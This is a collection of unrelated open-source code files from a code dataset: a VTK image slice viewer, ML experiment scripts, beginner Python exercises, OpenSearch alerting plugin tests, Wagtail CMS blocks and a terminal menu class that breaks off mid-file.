vtk.vtkOpenGLImageSliceMapper()\n inputMapper.SetInputConnection(reader.GetOutputPort())\n inputMapper.SliceAtFocalPointOn()\n inputMapper.SliceFacesCameraOn()\n inputMapper.BorderOn()\n inputMapper.SetNumberOfThreads(nThreads)\n inputMapper.StreamingOn()\n\n imageProperty = vtk.vtkImageProperty()\n imageProperty.SetColorLevel(level)\n imageProperty.SetColorWindow(window)\n imageProperty.SetInterpolationTypeToNearest()\n\n inputSlice = vtk.vtkImageSlice()\n inputSlice.SetMapper(inputMapper)\n inputSlice.SetProperty(imageProperty)\n\n # Create Renderer -> RenderWindow -> RenderWindowInteractor -> InteractorStyle\n renderer = vtk.vtkRenderer()\n renderer.AddActor(inputSlice)\n\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.AddRenderer(renderer)\n\n interactor = vtk.vtkRenderWindowInteractor()\n interactorStyle = vtk.vtkInteractorStyleImage()\n interactorStyle.SetInteractionModeToImageSlicing()\n interactorStyle.KeyPressActivationOn()\n\n interactor.SetInteractorStyle(interactorStyle)\n interactor.SetRenderWindow(renderWindow)\n\n # Add some functionality to switch layers for window/level\n def layerSwitcher(obj,event):\n if str(interactor.GetKeyCode()) == 'w':\n print(\"Image W/L: {w}/{l}\".format(w=imageProperty.GetColorWindow(), l=imageProperty.GetColorLevel()))\n elif str(interactor.GetKeyCode()) == 'n':\n # Set interpolation to nearest neighbour (good for voxel visualization)\n imageProperty.SetInterpolationTypeToNearest()\n interactor.Render()\n elif str(interactor.GetKeyCode()) == 'c':\n # Set interpolation to cubic (makes a better visualization)\n imageProperty.SetInterpolationTypeToCubic()\n interactor.Render()\n elif str(interactor.GetKeyCode()) == 'r':\n window = scalarRanges[1] - scalarRanges[0]\n level = (scalarRanges[1] + scalarRanges[0])/2\n imageProperty.SetColorLevel(level)\n imageProperty.SetColorWindow(window)\n interactor.Render()\n\n # Add ability to switch between active layers\n interactor.AddObserver('KeyPressEvent', layerSwitcher, -1.0) # Call layerSwitcher as last observer\n\n # Initialize and go\n interactor.Initialize()\n interactor.Start()\n\ndef main():\n # Setup description\n description='''2D slice visualizer\n\nThe following keyboard mappings are available:\n w Print window/Level to terminal\n n Set interpolator to nearest neighbour\n c Set interpolator to cubic\n r Reset window/level\n x View in x-plane\n y View in y-plane\n z View in z-plane\n q Quit\n\nThe 
following mouse mappings are available:\n left click + vertical scroll Modify window\n left click + horizontal scroll Modify level\n right click + vertical scroll Zoom\n control + left click + vertical scroll Slice level\n control + right click + vertical scroll Rotate slice\n shift + left click + vertical scroll Translate slice\n'''\n\n # Setup argument parsing\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter,\n prog=\"blSliceViewer\",\n description=description\n )\n parser.add_argument('input_filename', help='Input image file')\n parser.add_argument('--window',\n default=float(0), type=float,\n help='The initial window. If window is zero or less, the window is computed from the dynamic range of the image.')\n parser.add_argument('--level',\n default=float(0), type=float,\n help='The initial level. If window is zero or less, the level is computed from the dynamic range of the image.')\n parser.add_argument('--nThreads', '-n', \n default=int(1), type=int,\n help='Number of threads for each image slice visualizer (default: %(default)s)')\n\n # Parse and display\n args = parser.parse_args()\n print(echo_arguments('SliceViewer', vars(args)))\n\n # Run program\n SliceViewer(**vars(args))\n\nif __name__ == '__main__':\n main()\n","sub_path":"bonelab/cli/SliceViewer.py","file_name":"SliceViewer.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"351372413","text":"from src.experiments import run_experiment\nfrom src.parse_args import parser\n\n\nif __name__ == '__main__':\n config = {\n 'data_dir':'../data/umls',\n 'train':True,\n 'model':'point',\n 'bandwidth':400,\n 'entity_dim':200,\n 'relation_dim':200,\n 'history_dim':200,\n 'history_num_layers':3,\n 'num_rollouts':20,\n 'num_rollout_steps':2,\n 'bucket_interval':10,\n 'num_epochs':3,\n 'num_wait_epochs':200,\n 'num_peek_epochs':2,\n 'batch_size':128,\n 'train_batch_size':128,\n 'dev_batch_size':32,\n 'margin':1,\n 'learning_rate':0.001,\n 'baseline':'n/a',\n 'grad_norm':0,\n 'emb_dropout_rate':0.3,\n 'ff_dropout_rate':0.1,\n 'action_dropout_rate':0.9,\n 'action_dropout_anneal_interval':1000,\n 'beta':0.05,\n 'beam_size':128,\n 'num_path_per_entity':-1,\n 'use_action_space_bucketing':True,\n 'gpu':0\n\n }\n args,_ = parser.parse_known_args()\n [setattr(args,k,v) for k,v in config.items()]\n run_experiment(args)\n","sub_path":"src/run_experiment_with_config.py","file_name":"run_experiment_with_config.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"621626209","text":"#!/bin/env python3\n# -*- coding: iso8859-1 -*-\n\nimport os\nimport time\nfrom sys import *\nimport librosa\nimport matplotlib as plt\nimport argparse\n#os.path.append(getcwd()+\"spectrogram/\")\n#os.path.append(getcwd()+\"preprocessing/\")\n\nimport utils\nfrom spectrogram import spectrogram\nfrom preprocessing import preprocessing\nfrom preprocessing import audio\nfrom spectrogram import melSpectrogram\nfrom models import Model\nfrom models import cnn\nfrom models import vgg16\nutils.createFolder()\n\nparser = argparse.ArgumentParser(description='lgi2p-alose')\n\nparser.add_argument('-s','--spectrogram',help='Get all wav audio files from directory and compute the spectrogram of each file. t args allow to process png spectrogram, f args only process spectrogram data')\n\nparser.add_argument('-p','--preprocessing',help='Get a directory with audio files and splits them it into a shorter and create annotated file. If a number is written after the p arg, it will be the size of the cutted audio')\n\nparser.add_argument('-cnn','--convolutionalnetwork',help='Convolutional neural network')\n\nparser.add_argument('-cnnt','--testcnn',help='Test an audio file with convolutional network')\n\n\nparser.add_argument('-vgg','--vggconvolutionalnetwork',help='Convolutional network with pre-trained model. Args: \"a\" change all the layer of vgg16, \"l\" change the last layer ')\n\nparser.add_argument('-as','--analysis',help='Visualizing sounds')\n\n\n\n\nargs = parser.parse_args()\n\n'''\nSection dedicated to the convolutional neural network\n\n'''\nif args.convolutionalnetwork:\n if args.convolutionalnetwork ==\"b\":\n cnn = cnn.cnn()\n cnn.load()\n cnn.launch()\n\n if args.convolutionalnetwork==\"us\":\n cnn = cnn.cnn()\n cnn.loadUnderSampling()\n cnn.launch()\n\n if args.convolutionalnetwork==\"os\":\n cnn = cnn.cnn()\n cnn.load(True)\n cnn.launch()\n\n if args.convolutionalnetwork==\"uos\":\n cnn = cnn.cnn()\n cnn.load(True)\n cnn.launch()\n\n if args.convolutionalnetwork==\"of\":\n pass\n\n if args.convolutionalnetwork ==\"cm\":\n cnn = cnn.cnn()\n cnn.load()\n cnn.testModel(\"cnn\")\n\n else:\n print(\"Wrong arg for convolutional network\")\n\nif args.testcnn:\n cnn = cnn.cnn()\n cnn.predictAudio(args.testcnn.strip('\"'))\n\n\n\nif args.vggconvolutionalnetwork:\n\n if args.vggconvolutionalnetwork==\"b\":\n vgg = vgg16.vgg()\n vgg.load()\n vgg.launch()\n\n if args.vggconvolutionalnetwork==\"us\":\n vgg = vgg16.vgg()\n vgg.loadUnderSampling()\n vgg.launch()\n\n if args.vggconvolutionalnetwork==\"os\":\n vgg = vgg16.vgg()\n vgg.load(True)\n vgg.launch()\n\n if args.vggconvolutionalnetwork==\"uos\":\n vgg = vgg16.vgg()\n vgg.loadUnderSampling(True)\n vgg.launch()\n\n if args.vggconvolutionalnetwork==\"llb\":\n vgg = vgg16.vgg()\n vgg.load()\n vgg.launchLastLayer()\n\n if args.vggconvolutionalnetwork==\"llus\":\n vgg = vgg16.vgg()\n vgg.loadUnderSampling()\n vgg.launchLastLayer()\n\n if args.vggconvolutionalnetwork==\"llos\":\n vgg = vgg16.vgg()\n vgg.load(True)\n vgg.launchLastLayer()\n\n if args.vggconvolutionalnetwork==\"lluos\":\n vgg = vgg16.vgg()\n vgg.loadUnderSampling(True)\n vgg.launchLastLayer()\n\n if args.convolutionalnetwork ==\"cm\":\n cnn = cnn.cnn()\n cnn.load()\n cnn.testModel(\"vgg\")\n\n\n\n\n\n\n\n\n else :\n print(\"Wrong arg\")\n\nif args.spectrogram:\n utils.deleteMelSpectrogram()\n if args.spectrogram[0]:\n if args.spectrogram[0]=='t':\n spectrogram = spectrogram.spectrogram()\n spectrogram.melSpectrogram(True)\n if args.spectrogram[0]=='f':\n 
spectrogram = spectrogram.spectrogram()\n spectrogram.melSpectrogram(False)\n else:\n print(\"Errorr wrong arg\")\n exit()\n else:\n spectrogram = spectrogram.spectrogram()\n spectrogram.melSpectrogram()\n\nif args.preprocessing:\n utils.deletePreprocessing()\n preprocessing = preprocessing.preprocessing(args.preprocessing.strip('\"'))\n\n duration = input(\"Type the length of cutted audio. Or push enter for default duration (10 s): \")\n\n if len(duration)==0:\n preprocessing.trimmingAudio()\n else:\n duration = int(duration)\n preprocessing.trimmingAudio(44100,duration)\n\nif args.analysis:\n #try:\n x,sr = librosa.load(args.analysis.strip('\"'))\n utils.inspect_data(x)\n #except:\n #print(\"Path error\")\n","sub_path":"alose.py","file_name":"alose.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"385014204","text":"import datetime\nfrom datetime import date\nimport math\n\n#date & time\nprint(\"datetime:\")\nprint(datetime.datetime.now())\nprint(\"--------------------------\")\n\n#area of circle\nradius = float(input(\"enter the radius:\"))\narea = math.pi * pow(radius, 2)\nprint(\"area of circle is:\",area )\nprint(\"--------------------------\")\n\n#create list & tuple\ninput_seq = input(\"enter the number sequence: \")\nsplit_seq = input_seq.split(\",\")\nlist = []\nfor seq in split_seq:\n\tlist.extend(seq)\t\nprint(\"list : \",list)\nprint(\"tuple : \",tuple(list))\t\nprint(\"--------------------------\")\n\n#returning file extention\nfilename = input(\"enter the file name : \")\next = filename.split(\".\")\nprint(\"extention of file is: \",ext[1])\nprint(\"--------------------------\")\n\n#input = n;output = n+nn+nnn\nnumber = int(input(\"enter a number : \"))\ncount = 1\nresult =0\nwhile(count <= number):\n\ttemp = number ** count\n\tresult = result + temp\n\tcount = count + 1;\nprint(\"output : \",result)\nprint(\"--------------------------\")\n\n#return the difference of date\ndef diff_dates(d1,d2):\n\tdiff = d1-d2\n\tprint(\"number of days:\",diff.days)\n\treturn\nprint(\"difference between (1995,5,5) and (1995,1,7)\")\ndiff_dates(date(1995,5,5),date(1995,1,7))\nprint(\"--------------------------\") \n\t\t\n\n\n\t\n\n","sub_path":"madhuselvaraj/python-basics/basics1.py","file_name":"basics1.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"324887267","text":"# -*- coding: utf-8 -*-\n# SPDX-License-Identifier: Apache-2.0\n#\n# The OpenSearch Contributors require contributions made to\n# this file be licensed under the Apache-2.0 license or a\n# compatible open source license.\n#\n# Modifications Copyright OpenSearch Contributors. See\n# GitHub history for details.\n\n\nfrom __future__ import unicode_literals\n\nimport unittest\n\nimport pytest\n\nfrom opensearchpy.helpers.test import OPENSEARCH_VERSION\n\nfrom .. import AsyncOpenSearchTestCase\n\npytestmark = pytest.mark.asyncio\n\n\nclass TestAlertingPlugin(AsyncOpenSearchTestCase):\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_create_destination(self):\n # Test to create alert destination\n dummy_destination = {\n \"name\": \"my-destination\",\n \"type\": \"slack\",\n \"slack\": {\"url\": \"http://www.example.com\"},\n }\n response = await self.client.alerting.create_destination(dummy_destination)\n\n self.assertNotIn(\"errors\", response)\n self.assertIn(\"_id\", response)\n\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_get_destination(self):\n # Create a dummy destination\n await self.test_create_destination()\n\n # Try fetching the destination\n response = await self.client.alerting.get_destination()\n\n self.assertNotIn(\"errors\", response)\n self.assertGreaterEqual(response[\"totalDestinations\"], 1)\n self.assertEqual(response[\"totalDestinations\"], len(response[\"destinations\"]))\n\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_create_monitor(self):\n # Create a dummy destination\n await self.test_create_destination()\n\n # Try fetching the destination\n destination = await self.client.alerting.get_destination()\n self.assertGreaterEqual(\n destination[\"totalDestinations\"],\n 1,\n \"No destination entries found in the database.\",\n )\n\n # Select the first destination available\n destination = destination[\"destinations\"][0]\n\n # A dummy schedule for 1 minute interval\n schedule = {\"period\": {\"interval\": 1, \"unit\": \"MINUTES\"}}\n\n # A dummy query fetching everything\n query = {\"query\": {\"query_string\": {\"query\": \"*\"}}}\n\n # A dummy action with the dummy destination\n action = {\n \"name\": \"test-action\",\n \"destination_id\": destination[\"id\"],\n \"message_template\": {\"source\": \"This is my message body.\"},\n \"throttle_enabled\": True,\n \"throttle\": {\"value\": 27, \"unit\": \"MINUTES\"},\n \"subject_template\": {\"source\": \"TheSubject\"},\n }\n\n # A dummy trigger with the dummy action\n triggers = {\n \"name\": \"test-trigger\",\n \"severity\": \"1\",\n \"condition\": {\n \"script\": {\n \"source\": \"ctx.results[0].hits.total.value > 0\",\n \"lang\": \"painless\",\n }\n },\n \"actions\": [action],\n }\n\n # A dummy monitor with the dummy schedule, dummy query, dummy trigger\n monitor = {\n \"type\": \"monitor\",\n \"name\": \"test-monitor\",\n \"monitor_type\": \"query_level_monitor\",\n \"enabled\": True,\n \"schedule\": schedule,\n \"inputs\": [{\"search\": {\"indices\": [\"*\"], \"query\": query}}],\n \"triggers\": [triggers],\n }\n\n response = await self.client.alerting.create_monitor(monitor)\n\n self.assertNotIn(\"errors\", response)\n self.assertIn(\"_id\", response)\n 
self.assertIn(\"monitor\", response)\n\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_search_monitor(self):\n # Create a dummy monitor\n await self.test_create_monitor()\n\n # Create a monitor search query by it's name\n query = {\"query\": {\"match\": {\"monitor.name\": \"test-monitor\"}}}\n\n # Perform the search with the above query\n response = await self.client.alerting.search_monitor(query)\n\n self.assertNotIn(\"errors\", response)\n self.assertIn(\"hits\", response)\n self.assertEqual(response[\"hits\"][\"total\"][\"value\"], 1, \"No monitor found.\")\n\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_get_monitor(self):\n # Create a dummy monitor\n await self.test_create_monitor()\n\n # Create a monitor search query by it's name\n query = {\"query\": {\"match\": {\"monitor.name\": \"test-monitor\"}}}\n\n # Perform the search with the above query\n response = await self.client.alerting.search_monitor(query)\n\n # Select the first monitor\n monitor = response[\"hits\"][\"hits\"][0]\n\n # Fetch the monitor by id\n response = await self.client.alerting.get_monitor(monitor[\"_id\"])\n\n self.assertNotIn(\"errors\", response)\n self.assertIn(\"_id\", response)\n self.assertIn(\"monitor\", response)\n\n @unittest.skipUnless(\n (OPENSEARCH_VERSION) and (OPENSEARCH_VERSION < (2, 0, 0)),\n \"Plugin not supported for opensearch version\",\n )\n async def test_run_monitor(self):\n # Create a dummy monitor\n await self.test_create_monitor()\n\n # Create a monitor search query by it's name\n query = {\"query\": {\"match\": {\"monitor.name\": \"test-monitor\"}}}\n\n # Perform the search with the above query\n response = await self.client.alerting.search_monitor(query)\n\n # Select the first monitor\n monitor = response[\"hits\"][\"hits\"][0]\n\n # Run the monitor by id\n response = await self.client.alerting.run_monitor(monitor[\"_id\"])\n\n self.assertEqual(response[\"error\"], None)\n self.assertIn(\"monitor_name\", response)\n self.assertIn(\"period_start\", response)\n self.assertIn(\"period_end\", response)\n","sub_path":"test_opensearchpy/test_async/test_server/test_plugins/test_alerting.py","file_name":"test_alerting.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"438160816","text":"def SumFactor(num):\n\tsum=0\n\tfor i in range(1,int((num/2))+1,1):\n\t\tif(num % i == 0):\n\t\t\tsum += i\n\treturn sum\n\nno=int(input(\"Enter a number\"))\nret=SumFactor(no)\nprint(ret)\t\n","sub_path":"Assignment 2/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"473173668","text":"#FLM: Remove Unicode from Selected Glyphs\nselection = []\n\ndef getSel(font, glyph, gindex):\n\tselection.append(gindex)\nfl.ForSelected(getSel)\n\nbackupUNI = False\n\nfor gIndex in selection:\n\tg = fl.font[gIndex]\n\tbackupName = g.name+\"-oldUNI_\"+str(g.unicode)\n\tif (backupUNI == True) : g.name = backupName\n\tg.unicode = 0\nfl.UpdateFont(fl.ifont)","sub_path":"code_snippets/python/scripts/RemoveUnicode.py","file_name":"RemoveUnicode.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"272440359","text":"from google import google\n\nclass Search():\n def __init__(self, query, url, depth):\n self._query = query\n self._url = url\n self._depth = depth\n def search(self):\n search_result = google.search(\"travel\", 1)\n for s in search_result:\n print(s.link)\n print(s.google_link)\nif __name__ == \"__main__\":\n searcher = Search(\"travel\", \"clearmindtravel\", 1)\n searcher.search()","sub_path":"venv/app/searcher/searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"100103419","text":"from wagtail.core.blocks import StructBlock\nfrom wagtail.embeds.blocks import EmbedBlock\nfrom wagtail.images.blocks import ImageChooserBlock\nfrom wagtail.core import blocks\nimport datetime\nfrom wagtailmodelchooser.blocks import ModelChooserBlock\nfrom django.utils.translation import ugettext_lazy as _\n\nclass QuickLinkValue(blocks.StructValue):\n @property\n def url(self):\n if self.get('external_link'):\n return self['external_link']\n elif self['page']:\n return self['page'].url\n else:\n return None\n\nclass PromotedEventBlock(StructBlock):\n title = blocks.CharBlock(required=True, label=\"Title\")\n description = blocks.CharBlock(required=True, label=\"Description\")\n date = blocks.DateBlock()\n time = blocks.TimeBlock(required=True)\n display_type = blocks.ChoiceBlock(choices=[\n ('text', 'Text'),\n ('image', 'Image'),\n ('video', 'video'),\n ], icon = 'cup', default=\"text\")\n picture = ImageChooserBlock( required=False)\n embed = EmbedBlock(required=False)\n video_min_height = blocks.CharBlock(required=False, default=\"300px\")\n external_link = blocks.URLBlock(required=False, label=\"external_link\")\n page = blocks.PageChooserBlock(label=\"page\", required=False, help_text=\"Link a Page\")\n link_text = blocks.CharBlock(required=True, label=\"Button Text\", help_text=\"e.g Register Now\")\n def get_context(self, value, parent_context=None):\n context = super().get_context(value, parent_context=parent_context)\n context['is_happening_today'] = (value['date'] == datetime.date.today())\n return context\n class Meta:\n icon = 'media'\n label = \"Promoted Event\"\n template = \"event/blocks/PromotedEvent.html\"\n value_class = QuickLinkValue\n\n\nclass SpeakerBlock(blocks.StructBlock):\n speaker = ModelChooserBlock('event.Speaker')\n is_featured_guest = blocks.BooleanBlock(default=False, required=False)\n class Meta:\n icon = 'media'\n label = \"Speaker\"\n template = \"event/blocks/speaker.html\"\n\nclass EventSessionBlock(blocks.StructBlock):\n title = blocks.CharBlock(required=True, label=_(\"Date label\"))\n agenda = blocks.ListBlock(blocks.StructBlock([\n ('agenda', ModelChooserBlock('event.Agenda'))\n ]))\n class Meta:\n icon = 'media'\n label = \"Event Session\"\n template = \"event/blocks/session.html\"\n\n\nclass TicketBlock(blocks.StructBlock):\n button_text = blocks.CharBlock(default=\"Buy Ticket\")\n tickets = blocks.ListBlock(blocks.StructBlock([\n ('page', blocks.PageChooserBlock(required=True, target_model='shop.Product'))\n ])) \n class Meta:\n icon = 'media'\n label = \"Ticket Block\"\n template = \"event/blocks/TicketBlock.html\"","sub_path":"event/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"232449345","text":"# shebang para UNIX: #!/usr/local/bin/python3\r\n\r\nimport math\r\nimport sys\r\nimport errno\r\n\r\n\r\ndef circulo(raio):\r\n \"\"\"\r\n Cálculo da área\r\n \"\"\"\r\n return math.pi * float(raio) ** 2\r\n\r\n\r\ndef help():\r\n print(f\"\"\"\\\r\n É necessário informar o raio do círculo\r\n Sintaxe: {sys.argv[0]} \"\"\")\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n if len(sys.argv) < 2:\r\n help()\r\n # sys.exit(1) #Exit termina o arquivo. sysexit(1) de forma bem sucedida, qualquer outro número mostra erro.\r\n sys.exit(errno.EPERM) # errno.EPERM é o próprio número 1\r\n\r\n elif not sys.argv[1].isnumeric():\r\n help()\r\n print('O raio deve ser um valor numérico')\r\n sys.exit(errno.EINVAL)\r\n\r\n else:\r\n raio = sys.argv[1]\r\n area = circulo(raio)\r\n # print(sys.argv[0])\r\n print('Area do círculo: ', area)\r\n","sub_path":"anotacoes_curso/fundamentos_projetos/area_circulo_v9.py","file_name":"area_circulo_v9.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"369330990","text":"import tensorflow as tf\nimport numpy as np\nimport _hangle as hangle\n\nimport processing as tool\nimport os\nfrom tensorflow.contrib import learn\n\ncorpus = []\n\n# elem = []\n# elem.append(\"원하는 문장\")\n# elem.append(0)\n# corpus.append(elem)\n\n# corpus = np.array(corpus)\ncontents = []\ncontents.append(hangle.normalize(\"배그 최고\", english=True, number=True, punctuation=False))\ncontents.append(hangle.normalize(\"옵치에서 한남충새끼가 가오잡고 돼지멱따는소리내길래\", english=True, number=True, punctuation=False))\ncontents.append(hangle.normalize(\"출연진보면 시청자 30만은 찍어야 평타치는건데\", english=True, number=True, punctuation=False))\ncontents.append(hangle.normalize(\"슈라우드 글옵프로시절 팀메한테 스쿼드 전멸당했네 ㅋㅋ\", english=True, number=True, punctuation=False))\ncontents.append(hangle.normalize(\"딩셉션은 진짜 배그계의 대표 꼰대 다른말로 적폐 그자체였는데\", english=True, number=True, punctuation=False))\n\ncontents = tool.cut(contents, cut=2)\nprint(contents)\n\n# vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(200) # 객체 선언\nvocab_path = os.path.join(\"./\", \"vocab\")\nvocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\nx_test = np.array(list(vocab_processor.fit_transform(contents)))\n\n# Evaluation\n# ==================================================\n# checkpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\ngraph = tf.Graph()\nwith graph.as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False)\n sess = tf.Session(config=session_conf)\n with sess.as_default():\n # Load the saved meta graph and restore variables\n saver = tf.train.import_meta_graph('model-29300.meta')\n saver.restore(sess, 'model-29300')\n\n # Get the placeholders from the graph by name\n input_x = graph.get_operation_by_name(\"input_x\").outputs[0]\n # input_y = graph.get_operation_by_name(\"input_y\").outputs[0]\n dropout_keep_prob = graph.get_operation_by_name(\"dropout_keep_prob\").outputs[0]\n\n # Tensors we want to evaluate\n predictions = graph.get_operation_by_name(\"output/predictions\").outputs[0]\n\n def batch_iter(data, batch_size, num_epochs, shuffle=True):\n \"\"\"\n Generates a batch iterator for a dataset.\n \"\"\"\n data = np.array(data)\n data_size = len(data)\n num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1\n for epoch in range(num_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield shuffled_data[start_index:end_index]\n\n\n # Generate batches for one epoch\n batches = batch_iter(list(x_test), 64, 1, shuffle=False)\n\n # Collect the predictions here\n all_predictions = []\n\n for x_test_batch in batches:\n batch_predictions = sess.run(predictions, {input_x: x_test_batch, dropout_keep_prob: 1.0})\n all_predictions = np.concatenate([all_predictions, batch_predictions])\n print(all_predictions)","sub_path":"image_and_dcinside/dcinside_src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"513509599","text":"from .common import menuItem, echo, singleton\nfrom .window import Window\n\nclass MainMenu(Window):\n menu = None\n\n def __init__(self, name=\"main\"):\n super().__init__()\n\n # self.term = Terminal()\n self.screen_id = self.screen.bind()\n\n self.selection = 0\n self.left_top_corner = \"\\u250c\"\n self.right_top_corner = \"\\u2510\"\n self.left_bottom_corner = \"\\u2514\"\n self.right_bottom_corner = \"\\u2518\"\n self.hor_line = \"\\u2500\"\n self.vert_line = \"\\u2502\"\n\n self.next_select = [\"KEY_TAB\", \"KEY_RIGHT\"]\n self.prev_select = \"KEY_LEFT\"\n self.escape = [\"KEY_ESCAPE\"]\n\n self.background_clr = \"magenta\"\n self.cursor_back_clr = \"bold_red_reverse\"\n self.disabled_pos_clr = 'ivory4_reverse'\n self.text_clr = \"white\"\n\n self.position = \"top\"\n self.gap = 6\n self.left_gap = 1\n self.focus_owner = False\n self.sub_menu_focus = False\n self.parent = None\n self.sub = None\n self.name = name\n\n self.width = self.term.width\n\n if self.position == \"top\":\n self.menu_x = 1\n self.menu_y = 1\n elif self.position == \"bottom\":\n self.menu_x = 1\n self.menu_y = self.term.height - 1\n\n def is_menu(self) -> bool:\n return True\n\n def set_handle(self, handle: int = -1):\n handle = -1\n\n def __make_menu_item(self, m_item):\n menu_name:str = m_item[0]\n menu_name = menu_name.replace(' ', '_')\n setattr(self, menu_name, menuItem(m_item[0], m_item[1], m_item[2], m_item[3]))\n\n def set_menu(self, menu: list = None):\n self.menu = menu\n if self.menu is not None:\n for m in self.menu:\n if m[2] is not None:\n m[2].set_parent(self)\n m[2].set_main_wnd(self.main_wnd)\n self.__make_menu_item(m)\n\n\n def set_base_corner(self, x=0, y=0):\n if self.position == \"top\":\n self.menu_x = x\n self.menu_y = y\n elif self.position == \"bottom\":\n self.menu_x = x\n self.menu_y = self.term.__height - 1\n\n def set_parent(self, parent=None):\n self.parent = parent\n\n # def add_main_menu(self, menu):...\n\n def on_resize(self, sig, action):\n self.render()\n\n def on_paint(self):\n self.screen.begin()\n self.render()\n self.screen.end()\n\n def on_focus(self, focus: bool = False):\n self.focus_owner = focus\n if not focus:\n self.sub_menu_focus = False\n if self.sub is not None:\n self.sub.on_focus(False)\n self.sub.on_paint()\n\n def render(self):\n height, width = self.term.height, self.term.width\n scr_back_clr = getattr(self.term, 'on_' + self.background_clr)\n text_clr = getattr(self.term, self.text_clr)\n disabled_clr = getattr(self.term, self.disabled_pos_clr)\n\n # with self.term.location(self.menu_x, self.menu_y):\n # for ii in range(self.menu_x, width - self.menu_x, 1):\n # echo(f'{scr_back_clr} ')\n\n for ii in range(width - self.menu_x - 1):\n self.screen.echo(self.screen_id, self.menu_x + ii, self.menu_y, f'{scr_back_clr} {self.term.normal}{scr_back_clr}')\n\n # echo(self.term.normal)\n\n if self.menu is not None:\n echo(self.term.move(self.menu_y, self.menu_x))\n offset = self.left_gap\n for (idx, m) in enumerate(self.menu):\n title = m[0]\n if idx == self.selection and self.focus_owner:\n clr = getattr(self.term, self.cursor_back_clr)\n else:\n clr = scr_back_clr + text_clr\n\n if not self._sub(idx).enable:#m[1]:\n clr = disabled_clr + text_clr\n self.screen.echo(self.screen_id, self.menu_x + offset, self.menu_y, f'{clr}{title}{self.term.normal}{scr_back_clr}')\n\n offset += len(title) + self.gap\n\n if self.sub is not None and self.sub_menu_focus:\n self.sub.on_paint()\n\n def _sub(self, sel=-1):\n if sel == -1:\n sel = 
self.selection\n sel_name:str = self.menu[sel][0]\n sel_name = sel_name.replace(' ', '_')\n attr = getattr(self, sel_name)\n return attr\n\n def run_selection(self):\n sel = self._sub()\n if sel.function is not None:\n sel.function()\n\n def sub_menu_base_corner(self):\n offset = 0\n for ii in range(self.selection):\n offset += len(self.menu[ii][0]) + self.gap\n self.sub.set_base_corner(self.menu_x + 2 + offset, self.menu_y + 1)\n\n def child_lose_focus(self):\n self.on_focus(True)\n if self.sub is not None:\n self.sub.on_focus(False)\n self.sub.on_paint()\n self.sub_menu_focus = False\n self.main_wnd.on_paint()\n self.parent.on_paint()\n\n\n def __remove_sub_focus(self):\n self.on_focus(True)\n self.sub_menu_focus = False\n self.parent.on_paint()\n if self.sub is not None:\n self.sub.on_focus(False)\n\n def _next_select(self):\n self.selection += 1\n # self.selection = self.selection % len(self.menu)\n while not self._sub(self.selection % len(self.menu)).enable:\n self.selection += 1\n # self.selection = self.selection % len(self.menu)\n\n def _prev_select(self):\n self.selection -= 1\n # self.selection = self.selection % len(self.menu)\n while not self._sub(self.selection % len(self.menu)).enable:\n self.selection -= 1\n # self.selection = self.selection % len(self.menu)\n # self.selection -= 1\n\n def run(self, key=None):\n self.on_paint()\n sub = self._sub()\n self.sub = sub.sub_menu\n if key is not None:\n if self.focus_owner and not self.sub_menu_focus:\n if key.name in self.next_select:\n self._next_select()\n # self.selection += 1\n elif key.name == self.prev_select:\n self._prev_select()\n # self.selection -= 1\n elif key.name in self.escape:\n self.parent.child_lose_focus()\n\n if not 